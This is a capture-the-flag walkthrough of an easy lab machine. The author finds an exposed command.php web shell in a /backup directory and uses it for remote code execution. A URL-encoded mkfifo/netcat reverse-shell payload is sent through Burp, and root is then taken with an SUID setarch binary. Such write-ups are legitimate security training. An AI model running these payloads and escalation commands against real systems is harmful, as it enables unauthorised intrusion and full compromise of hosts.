Difficulty: Easy
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

This is another easy rated box from the same people who made Chili.


This time we get four ports:

  1. 22/tcp open ssh
  2. 80/tcp open http
  3. 7755/tcp open unknown
  4. 33060/tcp open mysqlx

With a detail scan we find out that port 80 is running nginx and port 7755 is another HTTP server, but this time it’s apache. Nmap isn’t sure what port 33060 is, despite suggesting it may be mysqlx.


Fuzzing for subdomains turns up nothing, and gobusting turns up just a single directory - /backup. We get a picture of a cherry from the front page of the webservers, but this time I didn’t bother with trying stego techniques on it. The two webservers appear basically identical, except on apache we can access /backup whereas on nginx it’s forbidden.

So, what’s in backup? This stuff:

  1. command.php 2020-09-07 03:30 293
  2. latest.tar.gz 2020-09-01 18:54 12M
  3. 2020-09-07 03:33 11M
  4. 2020-09-07 03:34 11M

We download these files, and the interesting one is command.php. Here’s what it contains:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- </?php echo passthru($_GET['backup']); ?/> -->

Hmm. So what happens if we do this?:

Response: www-data

So this gives us our RCE.


I used Burp Suite with the following payload:

GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f HTTP/1.1

to get a shell, and then I ran Linpeas.


It’s an SUID binary; this time it’s setarch

$ setarch $(arch) /bin/sh -p
cd /root
ls -lash
total 44K
4.0K drwx------  5 root root 4.0K Sep  7 04:21 .
4.0K drwxr-xr-x 20 root root 4.0K Sep  7 02:18 ..
4.0K -rw-------  1 root root  164 Sep  7 04:21 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:33 .local
4.0K -rw-------  1 root root   18 Sep  7 02:37 .mysql_history
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K drwx------  2 root root 4.0K Sep  7 02:21 .ssh
4.0K -rw-r--r--  1 root root  255 Sep  7 04:13 .wget-hsts
4.0K -rw-r--r--  1 root root   46 Sep  7 04:20 proof.txt
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:21 snap
cat proof.txt

So yes, it was easy after all.